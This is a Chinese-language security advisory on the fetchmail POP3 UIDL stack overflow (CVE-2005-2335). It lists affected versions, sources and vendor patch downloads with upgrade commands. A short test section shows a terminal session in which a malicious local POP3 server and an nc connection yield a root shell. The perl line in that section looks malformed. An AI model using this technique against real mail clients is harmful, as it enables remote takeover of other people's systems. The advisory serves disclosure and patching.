发布日期:2005-07-26
更新日期:2006-08-02
受影响系统:
Eric Raymond Fetchmail 6.2.5.1
Eric Raymond Fetchmail 6.2.5
Eric Raymond Fetchmail 6.2.0
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux AS 2.1 IA64
RedHat Enterprise Linux AS 2.1
RedHat Desktop 4.0
RedHat Desktop 3.0
RedHat Advanced Workstation 2.1 IA64
RedHat Advanced Workstation 2.1
不受影响系统:
Eric Raymond Fetchmail 6.2.6-pre7
Eric Raymond Fetchmail 6.2.5.2
描述:
BUGTRAQ ID:
14349CVE(CAN) ID:
CVE-2005-2335fetchmail是免费的软件包,可以从远程POP2、POP3、IMAP、ETRN或ODMR服务器检索邮件并将其转发给本地SMTP、LMTP服务器或消息传送代理。
fetchmail的POP3客户端在处理服务器回应时存在缓冲区溢出漏洞,恶意服务器可能利用此漏洞在客户端上执行任意指令。
fetchmail-6.2.5及更早版本的处理UID的POP3代码将POP3服务器返回的相应读取到栈中固定大小的缓冲区,没有限制输入长度,这样被入侵的或恶意的POP3服务器就可以覆盖fetchmail的栈,导致完全控制受影响的系统。
在fetchmail-6.2.5.1中,漏洞修复可以通过POP3 UIDL防范代码注入,但却引入了两个空指针引用。攻击者可能利用这个漏洞导致拒绝服务。
<*来源:Edward J. Shornock
Miloslav Trmac
Ludwig Nussel (
lnussel@suse.de)
Matthias Andree (
matthias.andree@gmx.de)
链接:
http://fetchmail.berlios.de/fetchmail-SA-2005-01.txt http://marc.theaimsgroup.com/?l=bugtraq&m=115447626326322&w=2 http://lwn.net/Alerts/144832/?format=printable http://security.gentoo.org/glsa/glsa-200507-21.xml http://www.debian.org/security/2005/dsa-774*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<---+in terminal 1+--->
farenhiet:/home/bannedit/fetchmail-6.2.5# /usr/local/bin/fetchmail -p pop3 --fastuidl 1 localhost
fetchmail: removing stale lockfile
Enter password for root@localhost:
UIDL 2
<---+in terminal 2+--->
farenhiet:/home/bannedit/exploit# perl -e '$|++;while (<>) { print . "\n\x00"; }' | nc localhost 20000
id
uid=0(root) gid=0(root) groups=0(root)
建议:
厂商补丁:
Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.apple.com/support/downloads/Debian
------
Debian已经为此发布了一个安全公告(DSA-774-1)以及相应补丁:
DSA-774-1:New fetchmail packages fix arbitrary code execution
链接:
http://www.debian.org/security/2005/dsa-774补丁下载:
Source archives:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1.dscSize/MD5 checksum: 650 3eb739416b5b7a906b56b3145cf1ba32
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1.diff.gzSize/MD5 checksum: 150578 12cdd33c6299e840ffcf3cfa00eb2e0e
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5.orig.tar.gzSize/MD5 checksum: 1257376 9956b30139edaa4f5f77c4d0dbd80225
Architecture independent components:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail-ssl_6.2.5-12sarge1_all.debSize/MD5 checksum: 42268 593148b798ec57fbca09340ecb139c1e
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmailconf_6.2.5-12sarge1_all.debSize/MD5 checksum: 101356 c7e81ed2ef2c7375e3afb9d937a1aa91
Alpha architecture:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_alpha.debSize/MD5 checksum: 572940 7426819c3db555eb6c1b5bf866b2113d
AMD64 architecture:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_amd64.debSize/MD5 checksum: 554678 56223b7979f4e4410c05620d153a01ba
ARM architecture:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_arm.debSize/MD5 checksum: 549146 b8f0493390f4aa713004f913f2696e73
Intel IA-32 architecture:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_i386.debSize/MD5 checksum: 548184 4b004ec450045c4d0d4b9fda7d9b04cc
Intel IA-64 architecture:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_ia64.debSize/MD5 checksum: 597056 5a7e4a0f676edeed83bd3e48d4747b57
HP Precision architecture:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_hppa.debSize/MD5 checksum: 561656 5ed8c10d345f358e85f58937e7aa79c9
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_m68k.debSize/MD5 checksum: 537964 8ce1a7e8de2858d8b9166c7166309173
Big endian MIPS architecture:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_mips.debSize/MD5 checksum: 556648 ee365e9943ae1646eb6ac051c6645833
Little endian MIPS architecture:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_mipsel.debSize/MD5 checksum: 556388 5f07b01938a6171da1c319006700ec93
PowerPC architecture:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_powerpc.debSize/MD5 checksum: 556168 55c628ab054ef7022c679e15edde8fae
IBM S/390 architecture:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_s390.debSize/MD5 checksum: 554510 5457354b0ee7ed5c735c582408396154
Sun Sparc architecture:
http://security.debian.org/pool/updates/main/f/fetchmail/fetchmail_6.2.5-12sarge1_sparc.debSize/MD5 checksum: 549168 db954a1eafe045ff6f2eb4c3c64abf3f
补丁安装方法:
1. 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb (file是相应的补丁名)
2. 使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
# apt-get update
然后,使用下面的命令安装更新软件包:
# apt-get upgrade
Eric Raymond
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Eric Raymond Patch fetchmail-patch-6.2.5.2.gz
http://download.berlios.de/fetchmail/fetchmail-patch-6.2.5.2.gzRedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2005:640-01)以及相应补丁:
RHSA-2005:640-01:Important: fetchmail security update
链接:
http://lwn.net/Alerts/144832/?format=printableGentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200507-21)以及相应补丁:
GLSA-200507-21:fetchmail: Buffer Overflow
链接:
http://security.gentoo.org/glsa/glsa-200507-21.xml所有fetchmail用户都应升级到最新版本:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/fetchmail-6.2.5.2"